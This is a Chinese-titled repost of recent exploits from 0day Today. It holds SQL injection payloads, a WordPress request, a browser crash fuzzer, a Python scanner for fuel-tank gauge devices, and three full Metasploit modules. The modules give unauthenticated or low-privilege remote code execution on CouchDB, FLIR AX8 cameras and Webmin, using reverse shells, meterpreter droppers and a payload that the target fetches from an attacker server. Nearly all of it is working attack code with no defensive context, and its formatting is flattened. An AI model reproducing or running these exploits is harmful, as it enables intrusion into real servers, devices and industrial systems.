【漏洞仓库】0day Today Team最近发布的Poc&Exp

/wp-admin/admin.php?page=blog2social-settings

POST /wp-admin/admin-ajax.php HTTP/1.1Host: 127.0.0.1Cookie: b2s_og_default_title=SiteTitle&b2s_og_default_desc=Just%20another%20WordPress%20site&b2s_og_default_image=&b2s_og_imagedata_active=1&b2s_og_objecttype_active=1&b2s_og_locale_active=1&b2s_og_locale=en_US&b2s_card_default_type=Summary&b2s_card_default_title=SiteTitle&b2s_card_default_desc=Just%20another%20WordPress%20site&b2s_card_default_image=&is_admin=1&version=0&action=b2s_save_social_meta_tags&b2s_security_nonce=<nonce> 

Parameter: keywords (GET)    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECTSLEEP(5)#     Type: time-based blind    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#

<script>function jsfuzzer() {  window.addEventListener("DOMNodeRemoved", eventhandler3);  svgvar00024.append(svgvar00021);} var i = 0;function eventhandler3() {  i++;  if (i > 1) { window.removeEventListener("DOMNodeRemoved", eventhandler3); }   var var00001 = document.createRange();  try { var00001.surroundContents(selectElement); } catch(e) { } // {1}  selectElement.length = 2; // {2}   // {3} - Need 1 of these 2 lines  console.log(selectElement.length);  //var var00170 = selectElement.item(1%selectElement.length);}</script><body onload=jsfuzzer()><svg id="svgvar00001" >  <glyph id="svgvar00021"/>  <altGlyph id="svgvar00024"/></svg><select id="selectElement">a</select>

#!/usr/bin/env python3   import timeimport socket            with open("/tmp/ATG_SCAN.txt",'r') as atg_file:    for line in atg_file.read().splitlines():        try:            atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)            port = 10001            search_str = 'IN-TANK INVENTORY'                          msg = str('x01' + 'I20100' + 'n').encode('ascii')            atg_socket.connect((line, port))            atg_socket.send(msg)            time.sleep(.25)            response = atg_socket.recv(1024).decode()            if search_str in response:                with open("/tmp/ATG_DEVICES.txt", 'a') as file2:                    file2.write(line + "t ->tATG Devicen")            else:                continue            atg_socket.close()           except:            passatg_file.close()

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking   include Msf::Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  include Msf::Exploit::Retry  include Msf::Exploit::Powershell  prepend Msf::Exploit::Remote::AutoCheck  require 'msf/core/exploit/powershell'  require 'digest'   # Constants required for communicating over the Erlang protocol defined here:  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html  EPM_NAME_CMD = "x00x01x6e".freeze  NAME_MSG = "x00x15nx00x07x00x03x49x9cAAAAAA@AAAAAAA".freeze  CHALLENGE_REPLY = "x00x15rx01x02x03x04".freeze  CTRL_DATA = "x83hx04ax06gwx0eAAAAAA@AAAAAAAx00x00x00x03x00x00x00x00x00wx00wx03rex".freeze  COOKIE = 'monster'.freeze  COMMAND_PREFIX = "x83hx02gwx0eAAAAAA@AAAAAAAx00x00x00x03x00x00x00x00x00hx05wx04callwx02oswx03cmdlx00x00x00x01k".freeze   def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Couchdb Erlang RCE',        'Description' => %q{          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without          authenticating and gain admin privileges.        },        'Author'  => [          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery          '1F98D',                     # Erlang Cookie RCE exploit          'Konstantin Burov',          # Apache CouchDB Erlang Cookie exploit          '_sadshade',                 # Apache CouchDB Erlang Cookie exploit          'jheysel-r7',                # Msf Module        ],        'References' => [          [ 'EDB', '49418' ],          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],          [ 'CVE', '2022-24706'],        ],        'License' => MSF_LICENSE,        'Platform' => ['win', 'linux'],        'Payload' => {          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method        },        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_openssl'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => :wget,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'              }            }          ],          [            'PowerShell Stager',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :psh_stager,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-01-21',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      ),    )     register_options(      [        Opt::RPORT(4369)      ]    )  end   def check    erlang_ports = get_erlang_ports    # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?     erlang_ports.each do |erlang_port|      # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been      # successful and the target as well as the specific socket used in this instance is vulnerable      sock = connect_to_erlang_server(erlang_port.to_i)      if sock.instance_of?(Socket)        @vulnerable_socket = sock        return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')      else        next      end    end    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')  end   # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers  #  # @return [Array] An array of port numbers for discovered Erlang Servers.  def get_erlang_ports    erlang_ports = []    begin      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })      # request Erlang nodes      sock.put(EPM_NAME_CMD)      sleep datastore['WfsDelay']      res = sock.get_once      unless res && res.include?("x00x00x11x11name couchdb")        print_error('Did not find any Erlang nodes')        return erlang_ports      end       print_status('Successfully found EDPM socket')      res.each_line do |line|        erlang_ports << line.match(/s(d+$)/)[0]      end    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e      print_error("Error connecting to EDPM: #{e.class} #{e}")      disconnect      return erlang_ports    end    erlang_ports  end   # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the  # default erlang cookie value in Apache CouchDB installations before 3.2.2  #  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server  def connect_to_erlang_server(erlang_port)    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })    print_status('Connection successful')    challenge = retry_until_truthy(timeout: 60) do      sock.put(NAME_MSG)      sock.get_once(5) # ok message      sock.get_once    end    # The expected successful response from the target should start with x00x1C    unless challenge && challenge.include?("x00x1C")      print_error('Connecting to the Erlang server was unsuccessful')      return    end     challenge = challenge[9..12].unpack('N*')[0]    challenge_reply = "x00x15rx01x02x03x04"    md5 = Digest::MD5.new    md5.update(COOKIE + challenge.to_s)    challenge_reply << [md5.hexdigest].pack('H*')    sock.put(challenge_reply)    sleep datastore['WfsDelay']    challenge_response = sock.get_once     if challenge_response.nil?      print_error('Authentication was unsuccessful')      return    end    print_status('Erlang challenge and response completed successfully')     sock  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")    disconnect    return  end   def compile_cmd(cmd)    msg = ''    msg << COMMAND_PREFIX    msg << [cmd.length].pack('S>')    msg << cmd    msg << "jwx04user"    payload = ("x70" + CTRL_DATA + msg)    ([payload.size].pack('N*') + payload)  end   def execute_command(cmd, opts = {})    payload = compile_cmd(cmd)    print_status('Sending payload... ')    opts[:sock].put(payload)    sleep datastore['WfsDelay']  end   def exploit_socket(sock)    case target['Type']    when :unix_cmd, :win_cmd      execute_command(payload.encoded, { sock: sock })    when :linux_dropper, :win_dropper      execute_cmdstager({ sock: sock })    when :psh_stager      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })    else      fail_with(Failure::BadConfig, 'Invalid target specified')    end  end   def exploit    # If the check method has already been run, use the vulnerable socket that has already been identified    if @vulnerable_socket      exploit_socket(@vulnerable_socket)    else      erlang_ports = get_erlang_ports      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)       erlang_ports.each do |erlang_port|        sock = connect_to_erlang_server(erlang_port.to_i)        next unless sock.instance_of?(Socket)         exploit_socket(sock)      end    end  endend

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## require 'rex/stopwatch' class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck   def initialize(info = {})    super(      update_info(        info,        'Name' => 'FLIR AX8 unauthenticated RCE',        'Description' => %q{          All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter          in the res.php endpoint.           This module uses the vulnerability to upload and execute payloads gaining root privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher          'h00die-gr3y' # metasploit module        ],        'References' => [          ['CVE', '2022-37061'],          ['PACKETSTORM', '168114'],          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],        ],        'DisclosureDate' => '2022-08-19',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'curl', 'printf' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end   def execute_command(cmd, _opts = {})    action_id = rand(1..40)    return send_request_cgi({      'method' => 'POST',      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',      'uri' => normalize_uri(target_uri.path, 'res.php'),      'vars_post' => {        'action' => 'alarm',        'id' => "#{action_id};#{cmd}"      }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    print_error("Communication error occurred: #{e.message}")    return nil  end   # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited!")    sleep_time = rand(5..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end     return Exploit::CheckCode::Unknown('No response received from the target!') unless res     print_status("Elapsed time: #{elapsed_time} seconds.")    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time     CheckCode::Vulnerable('Successfully tested command injection.')  end   def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager    end  endend

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking   include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::HTTP::Webmin  prepend Msf::Exploit::Remote::AutoCheck   def initialize(info = {})    super(      update_info(        info,        'Name' => 'Webmin File Manager RCE',        'Description' => %q{          In Webmin version 1.984, any authenticated low privilege user without access rights to          the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and          changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those          functionalities in the file manager.        },        'Author' => [          'faisalfs10x', # discovery          'jheysel-r7'   # module        ],        'References' => [          [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit          [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit          [ 'CVE', '2022-0824']        ],        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Privileged' => true,        'Targets' => [          [            'Automatic (Unix In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-02-26',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )     register_options(      [        OptPort.new('RPORT', [true, 'The default webmin port', 10000]),        OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),        OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])      ]    )  end   def check    webmin_check('0', '1.984')  end   def login    webmin_login(datastore['USERNAME'], datastore['PASSWORD'])  end   def download_remote_url    print_status('Fetching payload from HTTP server')     res = send_request_cgi({      'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),      'method' => 'POST',      'keep_cookies' => true,      'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',      'headers' => {        'Accept' => 'application/json, text/javascript, */*; q=0.01',        'Accept-Encoding' => 'gzip, deflate',        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',        'X-Requested-With' => 'XMLHttpRequest',        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1'      },      'vars_get' => {        'module' => 'filemin'      }    })     fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res    fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')    register_file_for_cleanup("/usr/share/webmin/#{@file_name}")  end   def modify_permissions    print_status('Modifying the permissions of the uploaded payload to 0755')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'),      'method' => 'POST',      'keep_cookies' => true,      'headers' => {        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1'      },      'vars_get' => {        'module' => 'filemin',        'page' => '1',        'paginate' => '30'      },      'vars_post' => {        'name' => @file_name,        'perms' => '0755',        'applyto' => '1',        'path' => '/usr/share/webmin'      }    })    fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302  end   def exec_revshell    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => normalize_uri(datastore['TARGETURI'], @file_name),      'headers' => {        'Connection' => 'keep-alive'      }    )     fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500  end   def on_request_uri(cli, request)    print_status("Request '#{request.method} #{request.uri}'")    print_status('Sending payload ...')    send_response(cli, payload.encoded,                  'Content-Type' => 'application/octet-stream')  end   def exploit    start_service    @file_name = (get_resource.gsub('/', '') + '.cgi')    cookie = login    fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty?    print_status('Downloading remote url')    download_remote_url    print_status('Finished downloading remote url')    modify_permissions    exec_revshell  endend